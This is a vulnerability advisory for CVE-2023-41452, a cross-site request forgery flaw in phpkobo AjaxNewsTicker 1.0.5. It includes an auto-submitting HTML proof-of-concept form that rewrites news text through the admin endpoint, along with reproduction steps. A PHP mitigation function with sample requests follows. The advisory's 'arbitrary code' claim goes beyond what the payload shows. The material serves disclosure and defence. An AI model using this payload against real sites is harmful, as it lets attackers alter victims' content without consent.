CVE-2023-41452
Vulnerability Type: Cross Site Request Forgery (CSRF) Vulnerability
Vendor of Product: phpkobo
Affected Product Code Base: AjaxNewsTicker
Product Version: 1.05
Description: Cross-Site Request Forgery vulnerability in phpkobo AjaxNewsTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload in the "txt" parameter of the "news" text in the index.php component.
Attack Vectors: To exploit this vulnerability, the attacker needs to manipulate a cross-site request coming from the target and get the victim to click on the malicious link.
Attack Type: Remote
Payload:
<html>
<body>
<script> history.pushState('','','/')</script>
<form action="http://localhost:2222/ntic/admin/index.php?_rtp=nticker&_be=1" method="POST" enctype="text/plain">
<input type="hidden" name="requ" value="&#123;&quot;cmd&quot;&#58;&quot;edit&#95;done&quot;&#44;&quot;id&quot;&#58;&quot;3524&quot;&#44;&quot;form&quot;&#58;&#123;&quot;title&quot;&#58;&quot;test&#95;rnpg50&quot;&#44;&quot;news&quot;&#58;&#91;&#123;&quot;txt&quot;&#58;&quot;You&apos;re&#32;Hacked&quot;&#125;&#93;&#44;&quot;t&#95;movein&quot;&#58;&quot;1000&quot;&#44;&quot;t&#95;pause&quot;&#58;&quot;2000&quot;&#44;&quot;speed&#95;moveout&quot;&#58;&quot;100&quot;&#44;&quot;fc&#95;news&quot;&#58;&quot;&quot;&#44;&quot;bc&#95;news&quot;&#58;&quot;&#35;FFFFFF&quot;&#44;&quot;fc&#95;btn&quot;&#58;&quot;&#35;E0E0E0&quot;&#44;&quot;bc&#95;btn&quot;&#58;&quot;&#35;404040&quot;&#44;&quot;rc&#95;ctar&quot;&#58;&quot;&#35;404040&quot;&#44;&quot;notes&quot;&#58;&quot;&quot;&#44;&quot;pinidx&quot;&#58;0&#125;&#125;"/>
<input type="submit" value="submit request"/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Assigned CVE-ID: CVE-2023-41452
Discoverer: Pedram Khazaei, Raspina Net Pars Group (RNPG Ltd.)
Steps To Reproduce
1. Browse to the following URL: https://<target.xyz>/ntic/admin/index.php?_rtp=nticker
2. Add a "news"
3. Add some title for newly added "news"
4. Add some text for newly added "news"
5. Insert the payload in the text of the "news"
6. You can execute arbitrary code via a crafted payload to the "txt" parameter in the index.php component.
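Mitigation sketch: a server-side guard that would refuse the forged POST shown in the payload. This is an added example, not phpkobo code and not part of the original advisory. The function name, the X-CSRF-Token header, the requirement that the admin UI post application/json, and the sample origins are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not phpkobo code. Returns null when a request may proceed,
// otherwise the reason it is refused. $server has the shape of $_SERVER.
function csrf_reject_reason(array $server, string $sessionToken, string $allowedOrigin): ?string
{
    $method = strtoupper($server['REQUEST_METHOD'] ?? 'GET');
    if (in_array($method, ['GET', 'HEAD', 'OPTIONS'], true)) {
        return null; // safe methods must never change state
    }
    // 1. Fetch metadata: an auto-submitted form on another site is "cross-site".
    $site = $server['HTTP_SEC_FETCH_SITE'] ?? '';
    if ($site !== '' && $site !== 'same-origin') {
        return 'cross-site request';
    }
    // 2. Origin, when the browser sends it, must be the admin origin.
    $origin = $server['HTTP_ORIGIN'] ?? '';
    if ($origin !== '' && $origin !== $allowedOrigin) {
        return 'origin mismatch';
    }
    // 3. An HTML form can only send text/plain, urlencoded or multipart bodies.
    //    Assumption: the admin UI is changed to post application/json.
    $ctype = strtolower(trim(explode(';', $server['CONTENT_TYPE'] ?? '')[0]));
    if ($ctype !== 'application/json') {
        return 'unexpected content type';
    }
    // 4. Per-session token in a custom header (hypothetical name), which a
    //    cross-origin form cannot set. Compared in constant time.
    $sent = $server['HTTP_X_CSRF_TOKEN'] ?? '';
    if ($sessionToken === '' || !hash_equals($sessionToken, $sent)) {
        return 'missing or invalid CSRF token';
    }
    return null;
}

// Constructed sample requests (not captured traffic); origins are placeholders.
$token  = bin2hex(random_bytes(32));
$forged = ['REQUEST_METHOD' => 'POST', 'CONTENT_TYPE' => 'text/plain',
           'HTTP_ORIGIN' => 'https://other-site.example',
           'HTTP_SEC_FETCH_SITE' => 'cross-site'];
$legacy = ['REQUEST_METHOD' => 'POST', 'CONTENT_TYPE' => 'text/plain']; // old browser, no Origin
$legit  = ['REQUEST_METHOD' => 'POST', 'CONTENT_TYPE' => 'application/json; charset=utf-8',
           'HTTP_ORIGIN' => 'https://admin.example',
           'HTTP_SEC_FETCH_SITE' => 'same-origin', 'HTTP_X_CSRF_TOKEN' => $token];
foreach (['forged' => $forged, 'legacy' => $legacy, 'legit' => $legit] as $name => $req) {
    echo $name, ': ', csrf_reject_reason($req, $token, 'https://admin.example') ?? 'allowed', PHP_EOL;
}
```

In a real handler the function would be called with $_SERVER and the token stored in $_SESSION before any state-changing command such as "edit_done" is processed.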